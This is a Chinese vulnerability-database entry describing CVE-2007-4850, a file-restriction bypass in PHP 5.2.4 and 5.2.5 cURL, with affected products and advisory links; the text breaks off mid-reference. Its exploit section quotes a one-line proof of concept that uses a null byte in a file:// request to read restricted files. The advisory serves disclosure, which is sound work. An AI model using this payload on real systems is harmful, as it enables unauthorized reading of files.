PHP cURL library 'curl/interface.c'安全设置绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114394 漏洞类型 权限许可和访问控制
发布时间 2008-01-23 更新时间 2009-03-06
CVE编号 CVE-2007-4850 CNNVD-ID CNNVD-200801-377
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/31053
https://www.securityfocus.com/bid/27413
https://cxsecurity.com/issue/WLB-2008010060
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200801-377
|漏洞详情
PHP5.2.4和5.2.5中cURL库(又名libcurl)的curl/interface.c文件存在安全设置绕过漏洞,远程攻击者可以通过一个文件file://request包含\x00序列绕过文件的safe_mode和open_basedir限制,读取任意文件。不同于CVE-2006-2563漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/27413/info

PHP cURL is prone to a 'safe mode' security-bypass vulnerability.

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

The issue affects PHP 5.2.5 and 5.2.4. 

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
|受影响的产品
Ubuntu Ubuntu Linux 8.04 LTS sparc Ubuntu Ubuntu Linux 8.04 LTS powerpc Ubuntu Ubuntu Linux 8.04 LTS lpia Ubuntu Ubuntu Linux 8.04 LTS i386 Ubuntu Ubuntu Linux 8.04 LTS amd64
|参考资料

来源:XF
名称:php-curlinit-security-bypass(39852)
链接:http://xforce.iss.net/xforce/xfdb/39852
来源:XF
名称:php-safemode-directive-security-bypass(42134)
链接:http://xforce.iss.net/xforce/xfdb/42134
来源:UBUNTU
名称:USN-628-1
链接:http://www.ubuntu.com/usn/usn-628-1
来源:BID
名称:31681
链接:http://www.securityfocus.com/bid/31681
来源:BID
名称:27413
链接:http://www.securityfocus.com/bid/27413
来源:BUGTRAQ
名称:20080527rPSA-2008-0178-1phpphp-mysqlphp-pgsql
链接:http://www.securityfocus.com/archive/1/archive/1/492671/100/0/threaded
来源:BUGTRAQ
名称:20080122PHP5.2.5cURLsafe_modebypass
链接:http://www.securityfocus.com/archive/1/archive/1/486856/100/0/threaded
来源:MANDRIVA
名称:MDVSA-2009:023
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2009:023
来源:MANDRIVA
名称:MDVSA-2009:022
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2009:022
来源:VUPEN
名称:ADV-2008-2780
链接:http://www.frsirt.com/english/advisories/2008/2780
来源:VUPEN
名称:ADV-2008-2268
链接:http://www.frsirt.com/english/advisories/2008/2268
来源:wiki.rpath.com
链接:ht